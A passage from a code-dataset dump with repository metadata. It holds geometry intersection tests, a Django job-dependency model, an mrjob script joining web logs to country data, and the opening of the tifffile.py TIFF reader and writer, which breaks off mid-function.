def test_poly_intersection(self):
# test polygons formed exactly as in test_line_intersection2, except
# the rings are implicitly closed
# -----
# | --x--
# | . . |
# --x-- |
# -----
poly0 = Polygon([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
poly1 = Polygon([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertTrue(poly0.intersects(poly1))
self.assertEqual(poly0.intersections(poly1), Multipoint([(0.0, 1.0), (1.0, 3.0)]))
return
def test_line_intersection_horizontal(self):
line0 = Line([(-2.5, 2.5), (2.5, 2.5)])
line1 = Line([(0.0, 0.0), (1.0, 5.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(0.5, 2.5)]))
return
def test_line_intersection_vertical(self):
line0 = Line([(2.5, 2.5), (2.5, -2.5)])
line1 = Line([(1.5, 2.5), (3.5, -2.5)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(2.5, 0.0)]))
return
def test_intersection_polygons(self):
poly0 = Polygon([(0, 0), (2, 0), (3, 1), (2, 1), (2, 2), (1, 0)])
poly1 = Polygon([(-1, -1), (1, -1), (1, 1), (-1, 1)])
self.assertTrue(poly0.intersects(poly1))
return
def test_line_intersects_geographical1(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-39.0, 34.0), (-39.0, 37.5)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical2(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-42.0, 34.0), (-41.0, 37.5)], crs=SphericalEarth)
self.assertFalse(line1.intersects(line2))
return
def test_line_intersects_geographical3(self):
# checks to make sure geodesics are handled
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (1.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# catches possible bugs in handling vertical segments on sweepline
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (0.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# checks that coordinates are normalized
line1 = Line([(-10.0, 20.0), (-30.0, 20.0)], crs=SphericalEarth)
line2 = Line([(340.0, 10.0), (340.0, 30.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_poly_contains1(self):
# trivial cases
pt0 = Point((-0.5, 0.92))
unitsquare = Polygon([(0.0,0.0), (1.0,0.0), (1.0,1.0), (0.0,1.0)])
self.assertFalse(unitsquare.contains(pt0))
pt1 = Point((0.125, 0.875))
self.assertTrue(unitsquare.contains(pt1))
x = np.arange(-4, 5)
y = (x)**2
line = Line([(x_,y_) for x_,y_ in zip(x, y)], crs=Cartesian)
bbox = Polygon([(-2.5, 2.5), (2.5, 2.5), (2.5, -2.5), (-2.5, -2.5)],
crs=Cartesian)
self.assertEqual(list(filter(bbox.contains, line)),
[Point((-1, 1)), Point((0, 0)), Point((1, 1))])
return
def test_poly_contains2(self):
# test some hard cases
diamond = Polygon([(0,0), (1,1), (2,0), (1, -1)])
self.assertFalse(diamond.contains(Point((2, 1))))
self.assertTrue(diamond.contains(Point((1, 0))))
self.assertFalse(diamond.contains(Point((2.5, 0))))
self.assertFalse(diamond.contains(Point((0, -1))))
self.assertFalse(diamond.contains(Point((2, -1))))
return
def test_poly_contains3(self):
# case where point is on an edge (should return true)
square = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertTrue(square.contains(Point([0.5, 0])))
self.assertTrue(square.contains(Point([0, 0.5])))
return
def test_poly_contains4(self):
# hippie star
theta = np.linspace(0, 2*np.pi, 361)[:-1]
r = 10*np.sin(theta*8) + 15
x = np.cos(theta) * r + 25
y = np.sin(theta) * r + 25
polygon = Polygon(zip(x, y))
# causes naive cross-product methods to fail
pt = Point((28.75, 25.625))
self.assertTrue(polygon.contains(pt))
return
def test_poly_contains_polar(self):
p = Polygon([(0, 80), (45, 80), (90, 80), (135, 80), (180, 80),
(225, 80), (270, 80), (315, 80)],
crs=SphericalEarth)
self.assertTrue(p.contains(Point((45, 85), crs=SphericalEarth)))
self.assertFalse(p.contains(Point((45, 75), crs=SphericalEarth)))
return
def test_within_distance(self):
line = Line([(0,0), (1,1), (3,1)])
pt = Point((1,1.5))
self.assertTrue(line.within_distance(pt, 0.6))
self.assertFalse(line.within_distance(pt, 0.4))
return
def test_multipoint_within_bbox(self):
vertices = [(float(x),float(y)) for x in range(-10,11)
for y in range(-10,11)]
ans = [v for v in vertices if (-5.0<v[0]<5.0) and (-4.0<v[1]<6.0)]
mp = Multipoint(vertices)
sub = mp.within_bbox((-5.0, -4.0, 5.0, 6.0))
self.assertEqual(sub, Multipoint(ans))
return
def test_multipoint_within_polygon(self):
np.random.seed(42)
x = (np.random.random(100) - 0.5) * 180.0
y = (np.random.random(100) - 0.5) * 30.0
xp = [-80, -50, 20, 35, 55, -45, -60]
yp = [0, -10, -8, -17, 15, 18, 12]
poly = Polygon(zip(xp, yp), crs=LonLatWGS84)
mp = Multipoint(zip(x, y), crs=LonLatWGS84)
subset = mp.within_polygon(poly)
excluded = [pt for pt in mp if pt not in subset]
self.assertTrue(all(poly.contains(pt) for pt in subset))
self.assertFalse(any(poly.contains(pt) for pt in excluded))
return
def test_multiline_touching_line(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
line = Line([(-30, -40), (11, -30), (10, 22), (-10, 50)])
touching = multiline.touching(line)
self.assertEqual(len(touching), 4)
return
def test_multipolygon_touching_line(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[10,0],[10,10],[0,10]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
line = Line([(-40, -35), (-15, -30), (30, 5), (10, 32), (-15, 17)])
touching = multipolygon.touching(line)
self.assertEqual(len(touching), 10)
return
def test_multiline_touching_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multiline.touching(poly)
self.assertEqual(len(touching), 12)
return
def test_multipolygon_touching_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multipolygon.touching(poly)
self.assertEqual(len(touching), 14)
return
def test_multiline_within_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multiline.within(poly)
self.assertEqual(len(within), 8)
return
def test_multipolygon_within_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multipolygon.within(poly)
self.assertEqual(len(within), 8)
return
if __name__ == "__main__":
unittest.main()
|
mit
| 7,244,258,512,799,947,000
| 38.788732
| 90
| 0.524071
| false
| 3.049933
| true
| false
| false
|
ChrisCooper/pipeline-nanny
|
taskmaster/models.py
|
1
|
3179
|
from django.db import models
class JobGroup(models.Model):
name = models.TextField()
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
def new_job(self, **args):
return Job.objects.create(group=self, **args)
def __repr__(self):
return "<Job group: {name} ({n_jobs} jobs)>".format(name=self.name, n_jobs=self.jobs.count())
def __str__(self):
return self.__repr__()
#def ready_jobs(self):
#return self.jobs.
class Job(models.Model):
name = models.TextField()
group = models.ForeignKey('JobGroup', related_name='jobs')
child_jobs = models.ManyToManyField('self', symmetrical=False, related_name='parent_jobs')
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
command = models.TextField()
stdout_file_location = models.TextField()
stderr_file_location = models.TextField()
WAITING = 0
READY = 1
RUNNING = 2
COMPLETED = 3
ERRORED = 4
KILLED = 5
STATUSES = (
(WAITING, 'Waiting'), # waiting on parent jobs
(READY, 'Ready'), # Can be started any time
(RUNNING, 'Running'), # Has been started
(COMPLETED, 'Completed'), # Exited with zero code
(ERRORED, 'Errored-out'), # Exited with a non-zero status
(KILLED, 'Killed'), # Used too many resources and was killed
)
status = models.IntegerField(choices=STATUSES, default=READY)
def __repr__(self):
return "<{status} Job: {name}, {n_parents} parents, {n_children} children>".format(
status=self.get_status_display(),
name=self.name,
n_parents=self.parent_jobs.count(),
n_children=self.child_jobs.count())
def add_child(self, dependant_job):
if dependant_job == self:
raise InvalidDependencyException("Error: Can't add a job as its own child. Job is {0}".format(self))
if self.depends_on(dependant_job):
raise InvalidDependencyException("Error: Dependency loops are not allowed. {0} already depends on {1}".format(self, dependant_job))
if dependant_job in self.child_jobs.all():
raise InvalidDependencyException("Error: Child job has already been added. {1} already depends on {0}".format(self, dependant_job))
if self.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child to a parent job that's already started. {0} already running (child: {1})".format(self, dependant_job))
if dependant_job.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child job that's already started. {1} already running (parent: {0})".format(self, dependant_job))
self.child_jobs.add(dependant_job)
dependant_job.status = Job.WAITING
self.save()
dependant_job.save()
def add_parent(self, prerequisite_job):
prerequisite_job.add_child(self)
def add_parents(self, prerequisite_jobs):
for job in prerequisite_jobs:
self.add_parent(job)
def add_children(self, dependent_jobs):
for job in dependent_jobs:
self.add_child(job)
def depends_on(self, job):
if (job in self.parent_jobs.all()):
return True
for dependency in self.parent_jobs.all():
if dependency.depends_on(job):
return True
return False
class InvalidDependencyException(Exception):
pass
|
mit
| 4,321,678,611,756,257,300
| 34.322222
| 164
| 0.705253
| false
| 3.211111
| false
| false
| false
|
explorerwjy/jw_anly502
|
PS03/join3.py
|
1
|
1856
|
#!/usr/bin/env python2
# To get started with the join,
# try creating a new directory in HDFS that has both the fwiki data AND the maxmind data.
import mrjob
from mrjob.job import MRJob
from mrjob.step import MRStep
from weblog import Weblog # imports class defined in weblog.py
import os
import re
import heapq
class FwikiMaxmindJoin(MRJob):
def mapper(self, _, line):
# Is this a weblog file, or a MaxMind GeoLite2 file?
filename = mrjob.compat.jobconf_from_env("map.input.file")
if "top1000ips_to_country.txt" in filename:
self.increment_counter("Status","top1000_ips_to_country file found",1)
try:
(ipaddr, country) = line.strip().split("\t")
yield ipaddr, "+"+country
except ValueError as e:
pass
else:
try:
o = Weblog(line)
except ValueError:
sys.stderr.write("Invalid Logfile line :{}\n".format(line))
return
if o.wikipage() == "Main_Page":
yield o.ipaddr, line
def reducer(self, key, values):
country = None
for v in values:
if v[0:1] == '+':
country = v[1:]
continue
if not country:
self.increment_counter("Warning","No Country Found", 1)
continue
o = Weblog(v)
yield "Geolocated",[o.date,country,v]
def mapper2(self,key,value):
country = value[1]
#country=re.findall('\[\"([^\d."]+)\",',value)[0]
yield country,1
def reducer2(self,key,values):
yield key,sum(values)
def mapper3(self,key,value):
yield "TOP10",(value,key)
def reducer3(self,key,values):
for count in heapq.nlargest(10,values):
yield key,count
def steps(self):
return [
MRStep(mapper=self.mapper,reducer=self.reducer),
MRStep(mapper=self.mapper2,reducer=self.reducer2),
MRStep(mapper=self.mapper3,reducer=self.reducer3)
]
if __name__=="__main__":
FwikiMaxmindJoin.run()
|
cc0-1.0
| 5,963,624,779,465,666,000
| 26.701493
| 89
| 0.651401
| false
| 2.979133
| false
| false
| false
|
jni/cellom2tif
|
cellom2tif/tifffile.py
|
1
|
173408
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tifffile.py
# Copyright (c) 2008-2014, Christoph Gohlke
# Copyright (c) 2008-2014, The Regents of the University of California
# Produced at the Laboratory for Fluorescence Dynamics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holders nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Read and write image data from and to TIFF files.
Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH,
SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files.
Only a subset of the TIFF specification is supported, mainly uncompressed
and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float,
grayscale and RGB(A) images, which are commonly used in bio-scientific imaging.
Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS,
and XMP metadata is not implemented.
Only primary info records are read for STK, FluoView, MicroManager, and
NIH image formats.
TIFF, the Tagged Image File Format, is under the control of Adobe Systems.
BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL,
and OME-TIFF, are custom extensions defined by Molecular Devices (Universal
Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics
International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy
Environment consortium respectively.
For command line usage run ``python tifffile.py --help``
:Author:
`Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_
:Organization:
Laboratory for Fluorescence Dynamics, University of California, Irvine
:Version: 2014.08.24
Requirements
------------
* `CPython 2.7 or 3.4 <http://www.python.org>`_
* `Numpy 1.8.2 <http://www.numpy.org>`_
* `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting)
* `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_
(recommended for faster decoding of PackBits and LZW encoded strings)
Notes
-----
The API is not stable yet and might change between revisions.
Tested on little-endian platforms only.
Other Python packages and modules for reading bio-scientific TIFF files:
* `Imread <http://luispedro.org/software/imread>`_
* `PyLibTiff <http://code.google.com/p/pylibtiff>`_
* `SimpleITK <http://www.simpleitk.org>`_
* `PyLSM <https://launchpad.net/pylsm>`_
* `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO)
* `BioImageXD.Readers <http://www.bioimagexd.net/>`_
* `Cellcognition.io <http://cellcognition.org/>`_
* `CellProfiler.bioformats
<https://github.com/CellProfiler/python-bioformats>`_
Acknowledgements
----------------
* Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics.
* Wim Lewis for a bug fix and some read_cz_lsm functions.
* Hadrien Mary for help on reading MicroManager files.
References
----------
(1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated.
http://partners.adobe.com/public/developer/tiff/
(2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html
(3) MetaMorph Stack (STK) Image File Format.
http://support.meta.moleculardevices.com/docs/t10243.pdf
(4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010).
Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011
(5) File Format Description - LSM 5xx Release 2.0.
http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc
(6) The OME-TIFF format.
http://www.openmicroscopy.org/site/support/file-formats/ome-tiff
(7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide.
http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf
(8) Micro-Manager File Formats.
http://www.micro-manager.org/wiki/Micro-Manager_File_Formats
(9) Tags for TIFF and Related Specifications. Digital Preservation.
http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml
Examples
--------
>>> data = numpy.random.rand(5, 301, 219)
>>> imsave('temp.tif', data)
>>> image = imread('temp.tif')
>>> numpy.testing.assert_array_equal(image, data)
>>> with TiffFile('temp.tif') as tif:
... images = tif.asarray()
... for page in tif:
... for tag in page.tags.values():
... t = tag.name, tag.value
... image = page.asarray()
"""
from __future__ import division, print_function
import sys
import os
import re
import glob
import math
import zlib
import time
import json
import struct
import warnings
import tempfile
import datetime
import collections
from fractions import Fraction
from xml.etree import cElementTree as etree
import numpy
try:
from . import _tifffile
except ImportError:
pass
__version__ = '0.3.3'
__docformat__ = 'restructuredtext en'
__all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter',
'TiffSequence')
def imsave(filename, data, **kwargs):
"""Write image data to TIFF file.
Refer to the TiffWriter class and member functions for documentation.
Parameters
----------
filename : str
Name of file to write.
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
kwargs : dict
Parameters 'byteorder', 'bigtiff', and 'software' are passed to
the TiffWriter class.
Parameters 'photometric', 'planarconfig', 'resolution',
'description', 'compress', 'volume', and 'extratags' are passed to
the TiffWriter.save function.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> description = '{"shape": %s}' % str(list(data.shape))
>>> imsave('temp.tif', data, compress=6,
... extratags=[(270, 's', 0, description, True)])
"""
tifargs = {}
for key in ('byteorder', 'bigtiff', 'software', 'writeshape'):
if key in kwargs:
tifargs[key] = kwargs[key]
del kwargs[key]
if 'writeshape' not in kwargs:
kwargs['writeshape'] = True
if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20:
tifargs['bigtiff'] = True
with TiffWriter(filename, **tifargs) as tif:
tif.save(data, **kwargs)
class TiffWriter(object):
"""Write image data to TIFF file.
TiffWriter instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> with TiffWriter('temp.tif', bigtiff=True) as tif:
... for i in range(data.shape[0]):
... tif.save(data[i], compress=6)
"""
TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6,
'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17}
TAGS = {
'new_subfile_type': 254, 'subfile_type': 255,
'image_width': 256, 'image_length': 257, 'bits_per_sample': 258,
'compression': 259, 'photometric': 262, 'fill_order': 266,
'document_name': 269, 'image_description': 270, 'strip_offsets': 273,
'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278,
'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283,
'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296,
'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320,
'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324,
'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339,
'image_depth': 32997, 'tile_depth': 32998}
def __init__(self, filename, bigtiff=False, byteorder=None,
software='tifffile.py'):
"""Create a new TIFF file for writing.
Use bigtiff=True when creating files greater than 2 GB.
Parameters
----------
filename : str
Name of file to write.
bigtiff : bool
If True, the BigTIFF format is used.
byteorder : {'<', '>'}
The endianness of the data in the file.
By default this is the system's native byte order.
software : str
Name of the software used to create the image.
Saved with the first page only.
"""
if byteorder not in (None, '<', '>'):
raise ValueError("invalid byteorder %s" % byteorder)
if byteorder is None:
byteorder = '<' if sys.byteorder == 'little' else '>'
self._byteorder = byteorder
self._software = software
self._fh = open(filename, 'wb')
self._fh.write({'<': b'II', '>': b'MM'}[byteorder])
if bigtiff:
self._bigtiff = True
self._offset_size = 8
self._tag_size = 20
self._numtag_format = 'Q'
self._offset_format = 'Q'
self._val_format = '8s'
self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0))
else:
self._bigtiff = False
self._offset_size = 4
self._tag_size = 12
self._numtag_format = 'H'
self._offset_format = 'I'
self._val_format = '4s'
self._fh.write(struct.pack(byteorder+'H', 42))
# first IFD
self._ifd_offset = self._fh.tell()
self._fh.write(struct.pack(byteorder+self._offset_format, 0))
def save(self, data, photometric=None, planarconfig=None, resolution=None,
description=None, volume=False, writeshape=False, compress=0,
extratags=()):
"""Write image data to TIFF file.
Image data are written in one stripe per plane.
Dimensions larger than 2 to 4 (depending on photometric mode, planar
configuration, and SGI mode) are flattened and saved as separate pages.
The 'sample_format' and 'bits_per_sample' TIFF tags are derived from
the data type.
Parameters
----------
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
photometric : {'minisblack', 'miniswhite', 'rgb'}
The color space of the image data.
By default this setting is inferred from the data shape.
planarconfig : {'contig', 'planar'}
Specifies if samples are stored contiguous or in separate planes.
By default this setting is inferred from the data shape.
'contig': last dimension contains samples.
'planar': third last dimension contains samples.
resolution : (float, float) or ((int, int), (int, int))
X and Y resolution in dots per inch as float or rational numbers.
description : str
The subject of the image. Saved with the first page only.
compress : int
Values from 0 to 9 controlling the level of zlib compression.
If 0, data are written uncompressed (default).
volume : bool
If True, volume data are stored in one tile (if applicable) using
the SGI image_depth and tile_depth tags.
Image width and depth must be multiple of 16.
Few software can read this format, e.g. MeVisLab.
writeshape : bool
If True, write the data shape to the image_description tag
if necessary and no other description is given.
extratags: sequence of tuples
Additional tags as [(code, dtype, count, value, writeonce)].
code : int
The TIFF tag Id.
dtype : str
Data type of items in 'value' in Python struct format.
One of B, s, H, I, 2I, b, h, i, f, d, Q, or q.
count : int
Number of data values. Not used for string values.
value : sequence
'Count' values compatible with 'dtype'.
writeonce : bool
If True, the tag is written to the first page only.
"""
if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'):
raise ValueError("invalid photometric %s" % photometric)
if planarconfig not in (None, 'contig', 'planar'):
raise ValueError("invalid planarconfig %s" % planarconfig)
if not 0 <= compress <= 9:
raise ValueError("invalid compression level %s" % compress)
fh = self._fh
byteorder = self._byteorder
numtag_format = self._numtag_format
val_format = self._val_format
offset_format = self._offset_format
offset_size = self._offset_size
tag_size = self._tag_size
data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C')
data_shape = shape = data.shape
data = numpy.atleast_2d(data)
# normalize shape of data
samplesperpixel = 1
extrasamples = 0
if volume and data.ndim < 3:
volume = False
if photometric is None:
if planarconfig:
photometric = 'rgb'
elif data.ndim > 2 and shape[-1] in (3, 4):
photometric = 'rgb'
elif volume and data.ndim > 3 and shape[-4] in (3, 4):
photometric = 'rgb'
elif data.ndim > 2 and shape[-3] in (3, 4):
photometric = 'rgb'
else:
photometric = 'minisblack'
if planarconfig and len(shape) <= (3 if volume else 2):
planarconfig = None
photometric = 'minisblack'
if photometric == 'rgb':
if len(shape) < 3:
raise ValueError("not a RGB(A) image")
if len(shape) < 4:
volume = False
if planarconfig is None:
if shape[-1] in (3, 4):
planarconfig = 'contig'
elif shape[-4 if volume else -3] in (3, 4):
planarconfig = 'planar'
elif shape[-1] > shape[-4 if volume else -3]:
planarconfig = 'planar'
else:
planarconfig = 'contig'
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
if samplesperpixel > 3:
extrasamples = samplesperpixel - 3
elif planarconfig and len(shape) > (3 if volume else 2):
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
extrasamples = samplesperpixel - 1
else:
planarconfig = None
# remove trailing 1s
while len(shape) > 2 and shape[-1] == 1:
shape = shape[:-1]
if len(shape) < 3:
volume = False
if False and (
len(shape) > (3 if volume else 2) and shape[-1] < 5 and
all(shape[-1] < i
for i in shape[(-4 if volume else -3):-1])):
# DISABLED: non-standard TIFF, e.g. (220, 320, 2)
planarconfig = 'contig'
samplesperpixel = shape[-1]
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
else:
data = data.reshape(
(-1, 1) + shape[(-3 if volume else -2):] + (1,))
if samplesperpixel == 2:
warnings.warn("writing non-standard TIFF (samplesperpixel 2)")
if volume and (data.shape[-2] % 16 or data.shape[-3] % 16):
warnings.warn("volume width or length are not multiple of 16")
volume = False
data = numpy.swapaxes(data, 1, 2)
data = data.reshape(
(data.shape[0] * data.shape[1],) + data.shape[2:])
# data.shape is now normalized 5D or 6D, depending on volume
# (pages, planar_samples, (depth,) height, width, contig_samples)
assert len(data.shape) in (5, 6)
shape = data.shape
bytestr = bytes if sys.version[0] == '2' else (
lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x)
tags = [] # list of (code, ifdentry, ifdvalue, writeonce)
if volume:
# use tiles to save volume data
tag_byte_counts = TiffWriter.TAGS['tile_byte_counts']
tag_offsets = TiffWriter.TAGS['tile_offsets']
else:
# else use strips
tag_byte_counts = TiffWriter.TAGS['strip_byte_counts']
tag_offsets = TiffWriter.TAGS['strip_offsets']
def pack(fmt, *val):
return struct.pack(byteorder+fmt, *val)
def addtag(code, dtype, count, value, writeonce=False):
# Compute ifdentry & ifdvalue bytes from code, dtype, count, value.
# Append (code, ifdentry, ifdvalue, writeonce) to tags list.
code = int(TiffWriter.TAGS.get(code, code))
try:
tifftype = TiffWriter.TYPES[dtype]
except KeyError:
raise ValueError("unknown dtype %s" % dtype)
rawcount = count
if dtype == 's':
value = bytestr(value) + b'\0'
count = rawcount = len(value)
value = (value, )
if len(dtype) > 1:
count *= int(dtype[:-1])
dtype = dtype[-1]
ifdentry = [pack('HH', code, tifftype),
pack(offset_format, rawcount)]
ifdvalue = None
if count == 1:
if isinstance(value, (tuple, list)):
value = value[0]
ifdentry.append(pack(val_format, pack(dtype, value)))
elif struct.calcsize(dtype) * count <= offset_size:
ifdentry.append(pack(val_format,
pack(str(count)+dtype, *value)))
else:
ifdentry.append(pack(offset_format, 0))
ifdvalue = pack(str(count)+dtype, *value)
tags.append((code, b''.join(ifdentry), ifdvalue, writeonce))
def rational(arg, max_denominator=1000000):
# return nominator and denominator from float or two integers
try:
f = Fraction.from_float(arg)
except TypeError:
f = Fraction(arg[0], arg[1])
f = f.limit_denominator(max_denominator)
return f.numerator, f.denominator
if self._software:
addtag('software', 's', 0, self._software, writeonce=True)
self._software = None # only save to first page
if description:
addtag('image_description', 's', 0, description, writeonce=True)
elif writeshape and shape[0] > 1 and shape != data_shape:
addtag('image_description', 's', 0,
"shape=(%s)" % (",".join('%i' % i for i in data_shape)),
writeonce=True)
addtag('datetime', 's', 0,
datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"),
writeonce=True)
addtag('compression', 'H', 1, 32946 if compress else 1)
addtag('orientation', 'H', 1, 1)
addtag('image_width', 'I', 1, shape[-2])
addtag('image_length', 'I', 1, shape[-3])
if volume:
addtag('image_depth', 'I', 1, shape[-4])
addtag('tile_depth', 'I', 1, shape[-4])
addtag('tile_width', 'I', 1, shape[-2])
addtag('tile_length', 'I', 1, shape[-3])
addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2)
addtag('sample_format', 'H', 1,
{'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind])
addtag('photometric', 'H', 1,
{'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric])
addtag('samples_per_pixel', 'H', 1, samplesperpixel)
if planarconfig and samplesperpixel > 1:
addtag('planar_configuration', 'H', 1, 1
if planarconfig == 'contig' else 2)
addtag('bits_per_sample', 'H', samplesperpixel,
(data.dtype.itemsize * 8, ) * samplesperpixel)
else:
addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8)
if extrasamples:
if photometric == 'rgb' and extrasamples == 1:
addtag('extra_samples', 'H', 1, 1) # associated alpha channel
else:
addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples)
if resolution:
addtag('x_resolution', '2I', 1, rational(resolution[0]))
addtag('y_resolution', '2I', 1, rational(resolution[1]))
addtag('resolution_unit', 'H', 1, 2)
addtag('rows_per_strip', 'I', 1,
shape[-3] * (shape[-4] if volume else 1))
# use one strip or tile per plane
strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1]
addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts)
addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1])
# add extra tags from users
for t in extratags:
addtag(*t)
# the entries in an IFD must be sorted in ascending order by tag code
tags = sorted(tags, key=lambda x: x[0])
if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize
> 2**31-1):
raise ValueError("data too large for non-bigtiff file")
for pageindex in range(shape[0]):
# update pointer at ifd_offset
pos = fh.tell()
fh.seek(self._ifd_offset)
fh.write(pack(offset_format, pos))
